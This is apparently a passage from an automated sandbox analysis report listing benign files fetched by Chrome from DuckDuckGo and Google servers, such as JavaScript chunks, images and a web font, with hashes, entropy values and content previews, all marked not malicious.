                                                                                                                                                            Preview:.PNG........IHDR.............Q..U....sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx...y\T..?....a...]@..Q...}....^.fi{.\"K..Ku...7....uoVfW.\+W...H....Ye.a6f.9...gf..EO.(....`f>s......9........B7.... t[.. $.&.!)09.I..AH.L.BR`r............. $.&.!)09.I..AH.L.BR`r............. $.&.!)09.I!...._....R..F+...........09........\.WP....\..,..$R...g....'*..U$.!.=.}.....F.R.C.-....O....j..*...K...j.x.v...0._........|...&..b......?... ..........P. @...Zod.C.Y.5...T./.|w..%..M...?..0.@)v..P...8.C.P...._....L.....C....zt#....k.O,... @.z.:[..$..a...q?..6.Q.|_{.g../.{.Qi/s\(7<..V.A......c.p..F)Pp5;..6`...((..3.....B5..ls..o.lxt!.h.....g..0?....<.j....* .P..s.*}..j.=`..M.../.|..*.43 ...+....q~S... .Y....(..l.X.!>...w......F09^c....I....&6&.........,.......bo..P..m.k..T.......@..W......|}.e.'$%.JG..)..Ka..&ft.z.........7...._q...D.....~.T'W.[..x.u.A..EP....UN.......\.g.G'..Mt......-gGM...D..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (57403), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57403
                                                                                                                                                            Entropy (8bit):6.003083462307852
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:T4NfM1sG0VVCX1Az63kzT+gSBvc5Su7BsKJP2qPWxb2X963hjllX7azp/9:TD1sGNc2a+Jhc5R0qefllX72p/9
                                                                                                                                                            MD5:DEC06D18965A6BF15345C5803248C0F1
                                                                                                                                                            SHA1:532D25177E6CB5438F7929FAA5B7D550BB8DB23A
                                                                                                                                                            SHA-256:9D41715960FA1CB9695E40D856B230059EF2681E82EC7D137312247049508649
                                                                                                                                                            SHA-512:D83459DDA1AE09B7C3674B5EF9C272289242C7EA0E58BC9C42EF68DFB36186D090B2D33CC992A8B6B77400954095B308CD798954434F854F5C6E2DB769A134AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[20581],{10153:function(M,A,g){"use strict";g.d(A,{dF:function(){return m}});var I=g(59499),i=g(17674),j=g(67294),N=g(44012),t=g(16682),e=g(18999),D=g(87188),c=g(18013),u=g(85194),n=g(32634),L=g(17732),a=g(11262),l=g(80912),C=g(682),r=g(76365),s=g(30178),y=g(76029),x=g(96122),z=g.n(x),o=g(85893),T="set-as-default-header",S={Brave:[(0,o.jsxs)(o.Fragment,{children:[(0,o.jsx)("img",{style:{aspectRatio:"6 / 7"},src:"/_next/static/media/Brave-S1-EN.41cbfdea.png",alt:""}),(0,o.jsx)(s.Z,{as:"p",level:"lg",children:(0,o.jsx)(N.Z,{id:"OzoXm5",values:{menuIcon:(0,o.jsx)(y.Menu,{}),Bold:function(M){return(0,o.jsx)("strong",{children:M})}}})})]}),(0,o.jsxs)(o.Fragment,{children:[(0,o.jsx)("img",{style:{aspectRatio:"6 / 7"},src:"/_next/static/media/Brave-S2-EN.bb4cd5cb.png",alt:""}),(0,o.jsx)(s.Z,{as:"p",level:"lg",children:(0,o.jsx)(N.Z,{id:"KeOiLq",values:{searchIcon:(0,o.jsx)(y.Search,{}),Bold:function(M){return(0,o.jsx)("strong",{children:
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1280x800, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):304480
                                                                                                                                                            Entropy (8bit):7.735029408283485
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:JSPx6Ye/qmy3rrR+guEmubBvKffNtcOsjJJJIYN9+PpFKkwa+lvb7:JwDvmykDEmAByncOQxb9iDWa+x7
                                                                                                                                                            MD5:EC6C55177F941FBEFD55A80EBF0A29F6
                                                                                                                                                            SHA1:D31CE32B7836313782095BF318201FA86AF0BD4C
                                                                                                                                                            SHA-256:CDAAD6A0922E2FE650BE3B809FE2B586EE460B2D34746C3B8D0FB7D7D0A8E686
                                                                                                                                                            SHA-512:EF60A5414613AE426CEBB5D9A0AC18E61B44F337E0C7B8271C6E777BA92A20C415A625199EAA1291541BBDB62CD192774169DA502989ECE55C702CA95505627E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/EfLqyLoo5-iga5l8oerPNmDlmJnUbZACbTAw0gOJhirRHXhLVgOaEa8BhqNNIzTjwUoSRObkvpBc3tICfQ0DV3EO=s1280-w1280-h800
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C....................................................................... .................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0....~_y.........Z.......:..V....~f.O.N..................4...]......Q.P.a..As.........Sb.o....7....C.?.....2=..Z.~E..p.......Rcw...o...Z....O....jm.V..>.....Qa.../.qw.....M.R........b..y......5.......l...E...o...?...4R.n&........RPg...y..>.%/....O.......[.....-?........U/Q...#.......%.P...O.XB.....<R...?..........o>...O...6.Q......=jl....a............T..n9...
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8622
                                                                                                                                                            Entropy (8bit):4.827305743493031
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:QUfVqjBWlcHahlEfpudU4eIC1z/VwDnFzyrxeHSa4kRKUFOb5+mx:pAXvf4lCdVwxX4kR9FOb5p
                                                                                                                                                            MD5:F71227D4C1C59E6C8AEA3791A44F9B8A
                                                                                                                                                            SHA1:A8AC97DDBD38A9464359044020DA510ADDD5B18F
                                                                                                                                                            SHA-256:98D5D89D779B63E95EE80F43DABFD82241C7F827D000AA94F5B1C95F4827FD03
                                                                                                                                                            SHA-512:BCB1FA29C91C41FD34F90892AB5D103E0C5E009C224D0D3228007FD29F255B1A247E4E246572BC0DABC1CA576F5747F97CCF7E782A1F965D156D0AA3C94014A7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<svg width="1044" height="591" viewBox="11 0 1022 591" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M466.483 473.074L498.52 517.748H501V503.706H520.67V457.758H531.91V434.783L554.394 419.461V442.441H562.824V503.706H579.684V485.329H604.974V446.27L616.218 438.612L627.458 446.27V476.903H633.078V415.632L666.798 438.612V454.831H680.847V399.641L692.092 391.983L703.332 399.641V475.78H711.762V452.503H742.671V488.39H748.291V431.717H756.721V406.444H766.279L782.015 385L797.752 406.444H807.305V431.717H815.735V453.929H824.165V415.632L835.405 407.974L846.645 415.632V453.929H852.269V509.834H863.509V453.929H869.129L883.179 434.783L897.229 453.929H902.849V492.219H919.709V430.948L942.193 446.27V465.416H953.433V492.219L967.483 473.074L999.52 517.748H1022V591H521H501H0V503.706H19.6699V457.758H30.9098V434.783L53.394 419.461V442.441H61.8239V503.706H78.6838V485.329H103.974V446.27L115.218 438.612L126.458 446.27V476.903H132.078V415.632L165.798 438.612V454.831H
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 100x297, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1750
                                                                                                                                                            Entropy (8bit):6.980599574957983
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3iWdWcg03pHdn/Z9+KpJXlbnoKmpEndAhcyp7dlKp:KcgMpHdn/ZoKLXlLo7qecyp7I
                                                                                                                                                            MD5:C85823AE3A4CAE5E5A581630A1F67E9E
                                                                                                                                                            SHA1:CB8D881291EB8C75707DBB77FEE9E4FAD817C35B
                                                                                                                                                            SHA-256:8CEAEBE70C8518BAB15F02AC42BBAEA3D888F99F96A8689E3366115A8704F126
                                                                                                                                                            SHA-512:9BE70BE6ED149B2ECF13528847879AA8209C212D29C9D1B012EA0A15DA2A5733DD2E1554C16B31F5D29D12152726A69A3068B849514B153EDCC3C44EF9C30659
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......).d.............................................................................~.J.""...3..Q....T......I.gL$ ...P..P..PAdUr.B..T..X..l".$.%E.C.L.*....%aO...%A....H..P....V.T...D.Q.\......VAafl..x.eIR....6VT..*J.EBgP.....*J.AE..........I.,,.jym.! .......RX.....+.z..R@.B...q..%....+.q.."*....,Ua".+....U.......5""" J.(H.... .!X." $...b.. H..Tb" $.i.X....GHU..b"@.-EQT......B..DQ....tJ.@.....t..Q.......J.Z"(..cy..]..XJ.2.s..t.V%` L.N[..r.eU...&d................................w...............................?.w...............................?.w...............................?.w.......................... 0@`p........?!.S......fg.33333=ffffffff|33....g.>.....4.Dp.dDx#..""""<.....g......g.......,..;..,...,................==..g@.ZK.zM#..J.............g.7{......).h.N...ai..oK..M@y3...kGX?..*0.-0..q..\.....=m...|..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (17087), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):17087
                                                                                                                                                            Entropy (8bit):5.044476125235913
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:mqMLNecAO1JRIEzH9wU0ug1bEwiogHxZ0:mfNLAO1JRIEzH9wU0ug1bEwihb0
                                                                                                                                                            MD5:376F808CE1D4E63D3CA50D227630A9E2
                                                                                                                                                            SHA1:9A0458F19796C6AB0982DC661BFCC95091F111F3
                                                                                                                                                            SHA-256:598CD2DB1443FE06D8EF4762CB885B8B5B1D33B70F6B1FAF9099683058392BF5
                                                                                                                                                            SHA-512:05060A020225DCE9A475C546C4AC3DDC9AAFCC9AFCCFBC88C8AE9C13611894C6225954D18265236A048FA8EFF44F2CD70D0A5A308480B3C763D1159891D0CC85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/kMKb7Bj0jhFmsUIWJjIQE/_buildManifest.js
                                                                                                                                                            Preview:self.__BUILD_MANIFEST=function(s,c,a,e,t,i,o,d,b,n,p,l,r,u,f,h,k,j,m,g,w,y,v,_,x,I,B,F,q,A,D,E,L,M,N,S,T,U,Y,C,P,z,G,H,J,K,O,Q,R,V,W,X,Z,$,ss,cs,as,es,ts,is,os,ds,bs,ns,ps,ls,rs,us,fs,hs,ks,js,ms){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[c,a,t,d,l,y,s,i,o,u,m,w,v,_,A,D,"static/chunks/pages/index-51d8b73bfd4680e3.js"],"/410":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/410-89e085a3951813d0.js"],"/411":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/411-2ea5bb8998bf0fdf.js"],"/412":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/412-708ec6a6a1160ded.js"],"/418":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/418-380ad1499044d78a.js"],"/50x":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-27285727e1d42752.js"],"/50x-nginxblock":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-nginxblock-060d348dd53458bd.js"],"/50x-tq":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-tq-4c99886f1e05cfab.js"],"/_error":["static/chunks/pages/_error-57fd588973025342.js"],"/about":[c,a,t,s,i,o,C,"static/css/df680b
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (13182), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):13182
                                                                                                                                                            Entropy (8bit):5.392703891978581
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:qLNdbt6TJXWRQlWWvqShHH7nJESvXmr8rGS38UQ3fw7V+DG1GB:WQUSpbmSvXGI7SuGB
                                                                                                                                                            MD5:F6DB9F424BC80791AEF94E454362D1AE
                                                                                                                                                            SHA1:966FFC2EC41E7F59CA8E36C4E6F1AC2BD9D63A25
                                                                                                                                                            SHA-256:153BA80333B839710D5C20A6C363D6EC0493BC33F9285F80CF198E9B900B61C7
                                                                                                                                                            SHA-512:14954CCB4E1D779055C26CC543DF919DF4ABE5F5B768F2B2B4DF32E12E9909CC33F1000B60A2CAFD80EFCD365B123F97518C35EDFB9D9C2D7EA05A53DC66CB08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/33817-15efb19a99b7ec93.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[33817],{28746:function(e,t,r){"use strict";var o=r(59499),n=r(4730),i=r(91521),a=r.n(i),s=r(94184),c=r.n(s),l=r(43165),d=r(76029),u=r(85893),f=["as","className","borderRadius","elevation","dismissable","onDismiss"];function m(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function p(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?m(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):m(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var v=(0,l.j)((function(e,t){var r,i=e.as,s=e.className,l=e.borderRadius,m=void 0===l?"md":l,v=e.elevation,_=void 0===v?50:v,g=e.dismissable,h=void
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1280x800, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):263053
                                                                                                                                                            Entropy (8bit):7.728690634482715
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:IiU0MqIivViI15DdXvPRegH61f/iVT8Ylbc0J:IPxivViI1LvPvH61XsTBlgQ
                                                                                                                                                            MD5:B3C1A3341B7DFAFB71938FA0407E01C3
                                                                                                                                                            SHA1:AC8CC1D6DB380AC388A9180977520DF52D95B5A8
                                                                                                                                                            SHA-256:02E552F70544054AB1E93B956EBE16412DF3AF00CCA01877212FD9D40458A055
                                                                                                                                                            SHA-512:6BD3F62A6C73071C7B499A113096E1C5110A545299927A0BC5E4DED95B05DCD551F20329D5F5D103F97C64D7BC906ABC5A48D4B4B4A0020D58DD3DA30C147B60
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/04Pvf_aHNL0yjC-7q52a48eZichJB2J9m-q_JACGVUbjDQDlVdCVIVy2g24n79GsYTcm8fxk07rhPVvQHDRXzuV9Dg=s1280-w1280-h800
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C....................................................................... .................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......?........?._c..R.Q.?.o..Z...>.G........Z..?.y._....M..q.....&........h/.._..b&.z.....ZF...........y........W.W.O....3q.....u.._/...Fg..{V...g...........U.....|.!..C.......5....?.....y.........~_..4...............O/.g.......sO...._TIm...........{u...U.......1.......u................../..............~.d."Ko.~....}~'.._U].!.l.=?.:...j.....O!.o...{..?o..<"...K.O
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 900 x 784, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40423
                                                                                                                                                            Entropy (8bit):7.969430866014362
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:jXVXEY82uKgRWGEQE+WP+Sp0KmAm/EawKMydi8OFfhz1NRTuZGiP6kh:jHgE+W2m0Kg/EawK9TOFfhz1N1uZGiyM
                                                                                                                                                            MD5:153557C559EA2E10B8BC312CCE950DE5
                                                                                                                                                            SHA1:00D830AA06B8B357054636644A6E2B0B9F77090E
                                                                                                                                                            SHA-256:29AFD98499E84526FCFF99D94A773C134A85EAC2E7FF55AAFE0583EFDDE2D024
                                                                                                                                                            SHA-512:05A5DA886F4FFF7F71A9956EC88C0C21C2FAEEB763A384D94AFB914C0727D6A2880C1482AB507571EE21ED64D818992B0F3506D009BBC38DEC6496F7BB97214B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR.............Hg[\....PLTE...000 ................................................................................................mmm................................. !".....333_ch.X3"""Q2.9i....???...aaa......JJJXYZ........yyy<=?//0......tuu..........stv...JKL.......................sw{..........k......ppp......fgh..............kJ...VVV...R|.....y.~b...PPPnnn.............ZZZ......Fs.dhm~...x..hlq.............aC..b?.........Y;.~..LLL...^..lpuaej........nR..........Er.....f..n...............tVw..o..a>osx............x^................}b'..i...-tRNS........... "....$....7'.Q..te.~.S(...ro.....K.....JIDATx...............................r.q...(s.K.T[.%..\.Q?.V.R.&.vb.1..c.1..c.1..c.1.rY...YO.z...l.....j;.g.].....R{MY...x...s.s.?0@...C.9.\"jca-{.i.'..i].us..^,i..C.p.d.....w.3`...~Y.5....b-Z......I`.L.R.IH...x..Y.R.RU..8,.@?...2P...lN.m......Efv=..K....as++L(C.,...?f.._.e...._*..._.?...2.....3.3.T=l......J'...6.&..{.*...s.1.....x.o.rGt
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 41908, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):41908
                                                                                                                                                            Entropy (8bit):7.99483905697986
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:sKB9Zsq8Ebw51cRBuHek03kXiG+Al1uC0YI+8cwAbRTo++2agBI+AZ:sKdsq8EbQcRMHef3kyG+y15L8cw0U0aD
                                                                                                                                                            MD5:BDB39D03661910C1BE4309004950B17B
                                                                                                                                                            SHA1:55BEED31D58FB78B5762FAF86428E0F6E1ADEDA8
                                                                                                                                                            SHA-256:F3A4B4D740F3BC6FC9BE76520559135BE004BF72EA54E4DD2412889C46A032D0
                                                                                                                                                            SHA-512:E42CA00AB2EAA3FAF99C53E0D0D324994C33925D806BC7A41CC53A070386015BD3E30673169DAD5D3C7FE55F20B6013C3C592B44F0320994D7666F8F9382E475
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/font/ProximaNova-Reg-webfont.woff2
                                                                                                                                                            Preview:wOF2............... ...F...........................?FFTM..f..(..D.`..&..F........p..P..`..6.$..<. ........a[W...r.v..D.;G.B. ......|........`....8.S.........,.......i.Z...4L.R..~.5.B..6E..e..(C.5.....s:..l3..J.-..}.z9..y.."C...........P..l....~Cim2L./....2....#1.K..$...\..O..K....R....j.....+.x)^s-..1c.p.}.F.vy..r...Y?....d.B..?M\241./...].L&.G2......n.J%.gV..!...aB"...dI.9...W..5..<.A.q...?.F9'K..y..C/.....+.......!...$..aI..5.*+4x.....8..A5.s.MMjbW....D.....?.f...}.(.H.C&..E.[...f.f.....Xq.5.L....\x.}...W..........~..y3.XD..d...<Q.J...J.$.L...w..w.s.L..*+.Ied..U.d.......g.n,......sw....}Cy..:h...T(.*.........v.R.."(...q.|..Y...l.9...R.....|._...,.d......O...}..4.........DfF.Mh.....%k.f.YfB.%.t.......t%....1.QsB.F)9...gf..!.G)V9j.TD9...._O...ok.s..C.J.Th*!C..!M.TB&..P.z.......P...t......3..K.2i....H.z.Mk...i...........`_.....m..3.&.h..f.d./....y.../..."v...S.+.K.e.r....O..s...@j.%.2K...9..*.M.T.^.z*&A....0......<X.C.Y.a.;L...../4.....
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):161391
                                                                                                                                                            Entropy (8bit):5.751554387050473
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:q1ZuZNTLmJnPWtBpgvBlMIaOj633rFId1ski2NqeT6+D:GZuZJSJnYOgts/
                                                                                                                                                            MD5:6A4517B73912F42B5ED4F2DB7A4901BC
                                                                                                                                                            SHA1:F490EC3920BB738D2A0FD7D23935023C24B454DA
                                                                                                                                                            SHA-256:10DADB3236AE6CC9B83767ADB8DAF0D151EFF5A6175D9846500ED47B5E289A0B
                                                                                                                                                            SHA-512:F16D6AA36DD1F0490415B61F0DFC3C8A7A963D43FAE567C36CF4206EA8923A9B2300EEA8BE7182825A19636233FAADA9C7406297F0B6B309CD1CF82DD8122983
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[12521],{98568:function(M,N,j){"use strict";j.d(N,{Z:function(){return O}});var L=j(50029),I=j(90116),D=j(87794),u=j.n(D),g=j(67294),A=j(94184),i=j.n(A),T=j(80912),t=j(30178),S=j(28746),y=j(85194),C=j(51420);var z=j(84457),x=j.n(z),E=j(85893);function a(){return(0,E.jsxs)(S.Z,{elevation:90,borderRadius:"lg",className:i()(x().card,x().skeleton),children:[(0,E.jsx)("div",{className:x().image}),(0,E.jsxs)("div",{className:x().content,children:[(0,E.jsx)(t.Z,{className:x().title,as:"h3",level:"lg",children:(0,I.Z)(Array(64)).fill("X").join()}),(0,E.jsx)(t.Z,{className:x().category,level:"eyebrow",children:"X"})]})]})}function e(M){var N,j=M.post,L=j.feature_image,I=j.title,D=j.url,u=j.tags,g=new URL(D).pathname.match(/[\w-]+/),A=L.includes("://")?(N=L,(0,C.ZP)("imageProxy",{params:{u:N}})):L,T=u&&(Array.isArray(u)?u[0].name:u.name);return(0,E.jsxs)(S.Z,{as:"a",elevation:90,borderRadius:"lg",className:i()("chromatic-ignore",x().card),h
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (17425), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):17425
                                                                                                                                                            Entropy (8bit):5.3599219457130225
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:ks+X39J5zK4TczK6TAyIoU17m0bkbv7eeNX2M0rwafp9oPgBPTHBg3EwIoH6:+zg1S1GeeNX23rwafp9o4BTHBAEf
                                                                                                                                                            MD5:0684E37E378C84FBED68E7DCB6756711
                                                                                                                                                            SHA1:B742A6324948499CA92058E2782E301A3B3F2517
                                                                                                                                                            SHA-256:6B18D30A0C7936F18738EDA72E691340884B963A48406D40358818F489B70AE5
                                                                                                                                                            SHA-512:CB7E4D68BA460568D5352B2A29685607B7F95CE25C68F299502BA82A6B501346ED864B0D9343C46BE56BAD26DC127D7069E7EBBBC5D1A318B99659C59915E4C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/66556-09213e8df9ecec74.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[66556],{28746:function(e,t,s){"use strict";var a=s(59499),n=s(4730),r=s(91521),i=s.n(r),o=s(94184),c=s.n(o),d=s(43165),l=s(76029),u=s(85893),p=["as","className","borderRadius","elevation","dismissable","onDismiss"];function m(e,t){var s=Object.keys(e);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);t&&(a=a.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),s.push.apply(s,a)}return s}function g(e){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{};t%2?m(Object(s),!0).forEach((function(t){(0,a.Z)(e,t,s[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(s)):m(Object(s)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(s,t))}))}return e}var h=(0,d.j)((function(e,t){var s,r=e.as,o=e.className,d=e.borderRadius,m=void 0===d?"md":d,h=e.elevation,v=void 0===h?50:h,f=e.dismissable,w=void
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 834 x 1258, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60280
                                                                                                                                                            Entropy (8bit):7.972056164007466
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:R6dez5XdhDfrgyiw5I3ewXt1mtooJFpWA+xYv8TisLiwoaiJsC7SH:RoezH5rN69Coomx7iwBYsGSH
                                                                                                                                                            MD5:44EA6D78E236EC73C24BCC10D6D8E9A4
                                                                                                                                                            SHA1:EF3EE4446AE791B59910D8A2DDB1090124469F14
                                                                                                                                                            SHA-256:27F6316660455CB0350A2B6D39747CBA5C95A7C51BD518955F05407E0326BDC6
                                                                                                                                                            SHA-512:1EDAE35D5DC869936450DBF240AD70D787CE44DBFAF0FE0D97C6517762796D8E84672A33BA6781AE3234DF30BD9D6545DE1ABD45FF410A92CC52C31A19261229
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...B.........Lh!K....PLTE...***..............................................................................(((.w......../...3i....5@.F............x........<s.BBB...9i.]]^...effZ..www....C5...yyy666...4.S........?.......X.....=..........A.....R........PPP.P.JKK...C..O....V.....[.E...h..a.J..T..C....#..........................+..r.L..kkkN......>r.m..3....U.......@..:.....I....ppp.?J.x.Qo.G............9m...........T......k.........c...H...blm.................#K|......2..%}..tu8........?..c..........A..}...C..............:\...I...RY...`.v.....d^k4.nnn--...c.....e..... !.....?...>.l... ..v...NI.a6.D..............T...... ........]....9........i2.......C]..p..........|"...s...dO{.Y+.....'*...X.qe....BL.W...........g...../[..9... _4....tRNS......"..&..R..ev...g`VM.ii....IDATx........0..iv..*.c.....................c.L.".a(..]....KY.t.l..UI...(.Y.x,.....v.._.z.........a r.LN.I)..3&..7..z..@.Ef....-0.25D`.^.<>..{..%Y{.q.m)D.>
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3817)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):122495
                                                                                                                                                            Entropy (8bit):5.474178038108451
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:KAIcfKjbgtJUz66xnuZOinr6vt1Xh9qEbxtxkdvv/58t9NXyjmxK/Ve2Ew6SwUtg:PIyKynnmvzXptxsn5Ew6SwUjW8o
                                                                                                                                                            MD5:67A9D1759AC090A6DA57E7E74EC2C9E3
                                                                                                                                                            SHA1:514744B4E09AF96AD6A78D3548E9D8DC952EDD9B
                                                                                                                                                            SHA-256:1645C6965B96EE7AC8A1A1E1CD499855CC599C7240408E8DCE9D769B90CE1523
                                                                                                                                                            SHA-512:91625199E500BA0791C7AA81DD9D7AE542E78799E7D10BB873AEFB10B1F3CADE2E54B58C053B4656392353A83C7731C6750AC001046BBF17A63A67FDC78BE85A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
                                                                                                                                                            Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},t=ca(this),v=function(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.v("Symbol",function(a){if(a)return a;var b=function(g,f){this.$jscomp$symbol$id_=g;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.random
